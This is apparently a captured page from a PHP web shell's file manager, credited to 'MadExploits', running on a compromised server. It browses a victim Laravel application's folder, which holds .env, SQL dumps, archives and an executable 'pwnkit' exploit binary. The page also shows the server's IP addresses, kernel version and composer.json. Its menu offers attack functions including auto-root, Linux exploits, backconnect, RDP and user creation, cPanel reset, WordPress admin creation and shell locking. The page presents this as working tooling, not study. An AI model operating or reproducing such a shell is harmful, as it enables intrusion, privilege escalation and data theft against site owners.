Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
gelifarma /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
delivery
[ DIR ]
drwxr-xr-x
pdf
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
sunat
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.env
953
B
-rw-r--r--
.env.example
651
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
155
B
-rw-r--r--
.htaccess
281
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
composer.json
1.62
KB
-rw-r--r--
composer.lock
148.19
KB
-rw-r--r--
index.html
274
B
-rw-r--r--
package.json
1022
B
-rw-r--r--
phpunit.xml
1.11
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.md
3.59
KB
-rw-r--r--
robots.txt
31
B
-rw-r--r--
server.php
563
B
-rw-r--r--
seven_2024.sql
62.01
KB
-rw-r--r--
seven_master_2024_JULIO.zip
33.26
MB
-rw-r--r--
sunat.zip
123.62
MB
-rw-r--r--
webpack.mix.js
549
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "description": "The Laravel Framework.", "keywords": ["framework", "laravel"], "license": "MIT", "type": "project", "require": { "php": "^7.1.3", "anouar/fpdf": "^2.0", "barryvdh/laravel-cors": "^2.0", "fideloper/proxy": "^4.0", "fruitcake/laravel-cors": "^2.0", "laravel/framework": "5.6.*", "laravel/tinker": "^1.0" }, "require-dev": { "filp/whoops": "^2.0", "fzaninotto/faker": "^1.4", "mockery/mockery": "^1.0", "nunomaduro/collision": "^2.0", "phpunit/phpunit": "^7.0" }, "autoload": { "classmap": [ "database/seeds", "database/factories" ], "psr-4": { "App\\": "app/" }, "files": [ "app/Helpers/sunat.php" ] }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "extra": { "laravel": { "dont-discover": [ ] } }, "scripts": { "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate" ], "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover" ] }, "config": { "preferred-install": "dist", "sort-packages": true, "optimize-autoloader": true }, "minimum-stability": "dev", "prefer-stable": true }
Close